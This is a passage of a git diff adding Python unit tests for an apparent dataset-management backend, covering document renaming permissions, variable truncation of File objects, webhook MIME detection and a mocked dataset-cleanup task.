mock_env["db_session"].query.assert_not_called() + + +def test_rename_document_dataset_not_found(mock_env): + mock_env["get_dataset"].return_value = None + + with pytest.raises(ValueError, match="Dataset not found"): + DocumentService.rename_document("missing", "doc", "x") + + +def test_rename_document_not_found(mock_env): + dataset = make_dataset("dataset-123") + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = None + + with pytest.raises(ValueError, match="Document not found"): + DocumentService.rename_document(dataset.id, "missing", "x") + + +def test_rename_document_permission_denied_when_tenant_mismatch(mock_env): + dataset = make_dataset("dataset-123") + # different tenant than current_user.current_tenant_id + document = make_document(dataset_id=dataset.id, tenant_id="tenant-other") + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + with pytest.raises(ValueError, match="No permission"): + DocumentService.rename_document(dataset.id, document.id, "x") diff --git a/api/tests/unit_tests/services/test_variable_truncator.py b/api/tests/unit_tests/services/test_variable_truncator.py index cf6fb25c1c..ec819ae57a 100644 --- a/api/tests/unit_tests/services/test_variable_truncator.py +++ b/api/tests/unit_tests/services/test_variable_truncator.py @@ -518,6 +518,55 @@ class TestEdgeCases: assert isinstance(result.result, StringSegment) +class TestTruncateJsonPrimitives: + """Test _truncate_json_primitives method with different data types.""" + + @pytest.fixture + def truncator(self): + return VariableTruncator() + + def test_truncate_json_primitives_file_type(self, truncator, file): + """Test that File objects are handled correctly in _truncate_json_primitives.""" + # Test File object is returned as-is without truncation + result = truncator._truncate_json_primitives(file, 1000) + + assert result.value == file + assert result.truncated is False + # Size should be calculated correctly + expected_size = VariableTruncator.calculate_json_size(file) + assert result.value_size == expected_size + + def test_truncate_json_primitives_file_type_small_budget(self, truncator, file): + """Test that File objects are returned as-is even with small budget.""" + # Even with a small size budget, File objects should not be truncated + result = truncator._truncate_json_primitives(file, 10) + + assert result.value == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_array(self, truncator, file): + """Test File objects in arrays are handled correctly.""" + array_with_files = [file, file] + result = truncator._truncate_json_primitives(array_with_files, 1000) + + assert isinstance(result.value, list) + assert len(result.value) == 2 + assert result.value[0] == file + assert result.value[1] == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_object(self, truncator, file): + """Test File objects in objects are handled correctly.""" + obj_with_files = {"file1": file, "file2": file} + result = truncator._truncate_json_primitives(obj_with_files, 1000) + + assert isinstance(result.value, dict) + assert len(result.value) == 2 + assert result.value["file1"] == file + assert result.value["file2"] == file + assert result.truncated is False + + class TestIntegrationScenarios: """Test realistic integration scenarios.""" diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 6afe52d97b..d788657589 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -82,19 +82,19 @@ class TestWebhookServiceUnit: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" with patch.object(WebhookService, "_process_file_uploads") as mock_process_files: - mock_process_files.return_value = {"upload": "mocked_file_obj"} + mock_process_files.return_value = {"file": "mocked_file_obj"} webhook_data = WebhookService.extract_webhook_data(webhook_trigger) assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert webhook_data["files"]["upload"] == "mocked_file_obj" + assert webhook_data["files"]["file"] == "mocked_file_obj" mock_process_files.assert_called_once() def test_extract_webhook_data_raw_text(self): @@ -110,6 +110,70 @@ class TestWebhookServiceUnit: assert webhook_data["method"] == "POST" assert webhook_data["body"]["raw"] == "raw text content" + def test_extract_octet_stream_body_uses_detected_mime(self): + """Octet-stream uploads should rely on detected MIME type.""" + app = Flask(__name__) + binary_content = b"plain text data" + + with app.test_request_context( + "/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content + ): + webhook_trigger = MagicMock() + mock_file = MagicMock() + mock_file.to_dict.return_value = {"file": "data"} + + with ( + patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect, + patch.object(WebhookService, "_create_file_from_binary") as mock_create, + ): + mock_create.return_value = mock_file + body, files = WebhookService._extract_octet_stream_body(webhook_trigger) + + assert body["raw"] == {"file": "data"} + assert files == {} + mock_detect.assert_called_once_with(binary_content) + mock_create.assert_called_once() + args = mock_create.call_args[0] + assert args[0] == binary_content + assert args[1] == "text/plain" + assert args[2] is webhook_trigger + + def test_detect_binary_mimetype_uses_magic(self, monkeypatch): + """python-magic output should be used when available.""" + fake_magic = MagicMock() + fake_magic.from_buffer.return_value = "image/png" + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "image/png" + fake_magic.from_buffer.assert_called_once() + + def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch): + """Fallback MIME type should be used when python-magic is unavailable.""" + monkeypatch.setattr("services.trigger.webhook_service.magic", None) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + + def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch): + """Fallback MIME type should be used when python-magic raises an exception.""" + try: + import magic as real_magic + except ImportError: + pytest.skip("python-magic is not installed") + + fake_magic = MagicMock() + fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error") + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + with patch("services.trigger.webhook_service.logger") as mock_logger: + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + mock_logger.debug.assert_called_once() + def test_extract_webhook_data_invalid_json(self): """Test webhook data extraction with invalid JSON.""" app = Flask(__name__) diff --git a/api/tests/unit_tests/tasks/test_clean_dataset_task.py b/api/tests/unit_tests/tasks/test_clean_dataset_task.py new file mode 100644 index 0000000000..bace66bec4 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_clean_dataset_task.py @@ -0,0 +1,1232 @@ +""" +Unit tests for clean_dataset_task. + +This module tests the dataset cleanup task functionality including: +- Basic cleanup of documents and segments +- Vector database cleanup with IndexProcessorFactory +- Storage file deletion +- Invalid doc_form handling with default fallback +- Error handling and database session rollback +- Pipeline and workflow deletion +- Segment attachment cleanup +""" + +import uuid +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.clean_dataset_task import clean_dataset_task + +# ============================================================================ +# Fixtures +# ============================================================================ + + +@pytest.fixture +def tenant_id(): + """Generate a unique tenant ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def dataset_id(): + """Generate a unique dataset ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def collection_binding_id(): + """Generate a unique collection binding ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def pipeline_id(): + """Generate a unique pipeline ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def mock_db_session(): + """Mock database session with query capabilities.""" + with patch("tasks.clean_dataset_task.db") as mock_db: + mock_session = MagicMock() + mock_db.session = mock_session + + # Setup query chain + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 0 + + # Setup scalars for select queries + mock_session.scalars.return_value.all.return_value = [] + + # Setup execute for JOIN queries + mock_session.execute.return_value.all.return_value = [] + + yield mock_db + + +@pytest.fixture +def mock_storage(): + """Mock storage client.""" + with patch("tasks.clean_dataset_task.storage") as mock_storage: + mock_storage.delete.return_value = None + yield mock_storage + + +@pytest.fixture +def mock_index_processor_factory(): + """Mock IndexProcessorFactory.""" + with patch("tasks.clean_dataset_task.IndexProcessorFactory") as mock_factory: + mock_processor = MagicMock() + mock_processor.clean.return_value = None + mock_factory_instance = MagicMock() + mock_factory_instance.init_index_processor.return_value = mock_processor + mock_factory.return_value = mock_factory_instance + + yield { + "factory": mock_factory, + "factory_instance": mock_factory_instance, + "processor": mock_processor, + } + + +@pytest.fixture +def mock_get_image_upload_file_ids(): + """Mock get_image_upload_file_ids function.""" + with patch("tasks.clean_dataset_task.get_image_upload_file_ids") as mock_func: + mock_func.return_value = [] + yield mock_func + + +@pytest.fixture +def mock_document(): + """Create a mock Document object.""" + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = str(uuid.uuid4()) + doc.dataset_id = str(uuid.uuid4()) + doc.data_source_type = "upload_file" + doc.data_source_info = '{"upload_file_id": "test-file-id"}' + doc.data_source_info_dict = {"upload_file_id": "test-file-id"} + return doc + + +@pytest.fixture +def mock_segment(): + """Create a mock DocumentSegment object.""" + segment = MagicMock() + segment.id = str(uuid.uuid4()) + segment.content = "Test segment content" + return segment + + +@pytest.fixture +def mock_upload_file(): + """Create a mock UploadFile object.""" + upload_file = MagicMock() + upload_file.id = str(uuid.uuid4()) + upload_file.key = f"test_files/{uuid.uuid4()}.txt" + return upload_file + + +# ============================================================================ +# Test Basic Cleanup +# ============================================================================ + + +class TestBasicCleanup: + """Test cases for basic dataset cleanup functionality.""" + + def test_clean_dataset_task_empty_dataset( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of an empty dataset with no documents or segments. + + Scenario: + - Dataset has no documents or segments + - Should still clean vector database and delete related records + + Expected behavior: + - IndexProcessorFactory is called to clean vector database + - No storage deletions occur + - Related records (DatasetProcessRule, etc.) are deleted + - Session is committed and closed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with("paragraph_index") + mock_index_processor_factory["processor"].clean.assert_called_once() + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_with_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test cleanup of dataset with documents and segments. + + Scenario: + - Dataset has one document and one segment + - No image files in segment content + + Expected behavior: + - Documents and segments are deleted + - Vector database is cleaned + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_deletes_related_records( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that all related records are deleted. + + Expected behavior: + - DatasetProcessRule records are deleted + - DatasetQuery records are deleted + - AppDatasetJoin records are deleted + - DatasetMetadata records are deleted + - DatasetMetadataBinding records are deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - verify query.where.delete was called multiple times + # for different models (DatasetProcessRule, DatasetQuery, etc.) + assert mock_query.delete.call_count >= 5 + + +# ============================================================================ +# Test Doc Form Validation +# ============================================================================ + + +class TestDocFormValidation: + """Test cases for doc_form validation and default fallback.""" + + @pytest.mark.parametrize( + "invalid_doc_form", + [ + None, + "", + " ", + "\t", + "\n", + " \t\n ", + ], + ) + def test_clean_dataset_task_invalid_doc_form_uses_default( + self, + invalid_doc_form, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that invalid doc_form values use default paragraph index type. + + Scenario: + - doc_form is None, empty, or whitespace-only + - Should use default IndexStructureType.PARAGRAPH_INDEX + + Expected behavior: + - Default index type is used for cleanup + - No errors are raised + - Cleanup proceeds normally + """ + # Arrange - import to verify the default value + from core.rag.index_processor.constant.index_type import IndexStructureType + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=invalid_doc_form, + ) + + # Assert - IndexProcessorFactory should be called with default type + mock_index_processor_factory["factory"].assert_called_once_with(IndexStructureType.PARAGRAPH_INDEX) + mock_index_processor_factory["processor"].clean.assert_called_once() + + def test_clean_dataset_task_valid_doc_form_used_directly( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that valid doc_form values are used directly. + + Expected behavior: + - Provided doc_form is passed to IndexProcessorFactory + """ + # Arrange + valid_doc_form = "qa_index" + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=valid_doc_form, + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with(valid_doc_form) + + +# ============================================================================ +# Test Error Handling +# ============================================================================ + + +class TestErrorHandling: + """Test cases for error handling and recovery.""" + + def test_clean_dataset_task_vector_cleanup_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test that document cleanup continues even if vector cleanup fails. + + Scenario: + - IndexProcessor.clean() raises an exception + - Document and segment deletion should still proceed + + Expected behavior: + - Exception is caught and logged + - Documents and segments are still deleted + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_index_processor_factory["processor"].clean.side_effect = Exception("Vector database error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - documents and segments should still be deleted + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_storage_delete_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if storage deletion fails. + + Scenario: + - Segment contains image file references + - Storage.delete() raises an exception + - Cleanup should continue + + Expected behavior: + - Exception is caught and logged + - Image file record is still deleted from database + - Other cleanup operations proceed + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type to avoid file deletion + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = "Test content with image" + + mock_upload_file = MagicMock() + mock_upload_file.id = str(uuid.uuid4()) + mock_upload_file.key = "images/test-image.jpg" + + image_file_id = mock_upload_file.id + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [image_file_id] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + mock_storage.delete.side_effect = Exception("Storage service unavailable") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted for image file + mock_storage.delete.assert_called_with(mock_upload_file.key) + # Image file should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_database_error_rollback( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is rolled back on error. + + Scenario: + - Database operation raises an exception + - Session should be rolled back to prevent dirty state + + Expected behavior: + - Session.rollback() is called + - Session.close() is called in finally block + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Database commit failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.rollback.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_rollback_failure_still_closes_session( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that session is closed even if rollback fails. + + Scenario: + - Database commit fails + - Rollback also fails + - Session should still be closed + + Expected behavior: + - Session.close() is called regardless of rollback failure + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Commit failed") + mock_db_session.session.rollback.side_effect = Exception("Rollback failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test Pipeline and Workflow Deletion +# ============================================================================ + + +class TestPipelineAndWorkflowDeletion: + """Test cases for pipeline and workflow deletion.""" + + def test_clean_dataset_task_with_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + pipeline_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline and workflow are deleted when pipeline_id is provided. + + Expected behavior: + - Pipeline record is deleted + - Related workflow record is deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=pipeline_id, + ) + + # Assert - verify delete was called for pipeline-related queries + # The actual count depends on total queries, but pipeline deletion should add 2 more + assert mock_query.delete.call_count >= 7 # 5 base + 2 pipeline/workflow + + def test_clean_dataset_task_without_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline/workflow deletion is skipped when pipeline_id is None. + + Expected behavior: + - Pipeline and workflow deletion queries are not executed + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=None, + ) + + # Assert - verify delete was called only for base queries (5 times) + assert mock_query.delete.call_count == 5 + + +# ============================================================================ +# Test Segment Attachment Cleanup +# ============================================================================ + + +class TestSegmentAttachmentCleanup: + """Test cases for segment attachment cleanup.""" + + def test_clean_dataset_task_with_attachments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that segment attachments are cleaned up properly. + + Scenario: + - Dataset has segment attachments with associated files + - Both binding and file records should be deleted + + Expected behavior: + - Storage.delete() is called for each attachment file + - Attachment file records are deleted from database + - Binding records are deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + # Setup execute to return attachment with binding + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_attachment_file.key) + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + def test_clean_dataset_task_attachment_storage_failure( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if attachment storage deletion fails. + + Expected behavior: + - Exception is caught and logged + - Attachment file and binding are still deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + mock_storage.delete.side_effect = Exception("Storage error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted + mock_storage.delete.assert_called_once() + # Records should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + +# ============================================================================ +# Test Upload File Cleanup +# ============================================================================ + + +class TestUploadFileCleanup: + """Test cases for upload file cleanup.""" + + def test_clean_dataset_task_deletes_document_upload_files( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that document upload files are deleted. + + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info contains upload_file_id + + Expected behavior: + - Upload file is deleted from storage + - Upload file record is deleted from database + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "test-file-id"}' + mock_document.data_source_info_dict = {"upload_file_id": "test-file-id"} + + mock_upload_file = MagicMock() + mock_upload_file.id = "test-file-id" + mock_upload_file.key = "uploads/test-file.txt" + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_upload_file.key) + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_handles_missing_upload_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing upload files are handled gracefully. + + Scenario: + - Document references an upload_file_id that doesn't exist + + Expected behavior: + - No error is raised + - Cleanup continues normally + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "nonexistent-file"}' + mock_document.data_source_info_dict = {"upload_file_id": "nonexistent-file"} + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_handles_non_upload_file_data_source( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that non-upload_file data sources are skipped. + + Scenario: + - Document has data_source_type = "website" + + Expected behavior: + - No file deletion is attempted + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete should not be called for document files + # (only for image files in segments, which are empty here) + mock_storage.delete.assert_not_called() + + +# ============================================================================ +# Test Image File Cleanup +# ============================================================================ + + +class TestImageFileCleanup: + """Test cases for image file cleanup in segments.""" + + def test_clean_dataset_task_deletes_image_files_in_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that image files referenced in segment content are deleted. + + Scenario: + - Segment content contains image file references + - get_image_upload_file_ids returns file IDs + + Expected behavior: + - Each image file is deleted from storage + - Each image file record is deleted from database + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = ' ' + + image_file_ids = ["image-1", "image-2"] + mock_get_image_upload_file_ids.return_value = image_file_ids + + mock_image_files = [] + for file_id in image_file_ids: + mock_file = MagicMock() + mock_file.id = file_id + mock_file.key = f"images/{file_id}.jpg" + mock_image_files.append(mock_file) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Setup a mock query chain that returns files in sequence + mock_query = MagicMock() + mock_where = MagicMock() + mock_query.where.return_value = mock_where + mock_where.first.side_effect = mock_image_files + mock_db_session.session.query.return_value = mock_query + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + assert mock_storage.delete.call_count == 2 + mock_storage.delete.assert_any_call("images/image-1.jpg") + mock_storage.delete.assert_any_call("images/image-2.jpg") + + def test_clean_dataset_task_handles_missing_image_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing image files are handled gracefully. + + Scenario: + - Segment references image file ID that doesn't exist in database + + Expected behavior: + - No error is raised + - Cleanup continues + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = '' + + mock_get_image_upload_file_ids.return_value = ["nonexistent-image"] + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Image file not found + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + +# ============================================================================ +# Test Edge Cases +# ============================================================================ + + +class TestEdgeCases: + """Test edge cases and boundary conditions.""" + + def test_clean_dataset_task_multiple_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of multiple documents and segments. + + Scenario: + - Dataset has 5 documents and 10 segments + + Expected behavior: + - All documents and segments are deleted + """ + # Arrange + mock_documents = [] + for i in range(5): + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = tenant_id + doc.data_source_type = "website" # Non-upload type + mock_documents.append(doc) + + mock_segments = [] + for i in range(10): + seg = MagicMock() + seg.id = str(uuid.uuid4()) + seg.content = f"Segment content {i}" + mock_segments.append(seg) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + mock_documents, + mock_segments, + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - all documents and segments should be deleted + delete_calls = mock_db_session.session.delete.call_args_list + deleted_items = [call[0][0] for call in delete_calls] + + for doc in mock_documents: + assert doc in deleted_items + for seg in mock_segments: + assert seg in deleted_items + + def test_clean_dataset_task_document_with_empty_data_source_info( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test handling of document with empty data_source_info. + + Scenario: + - Document 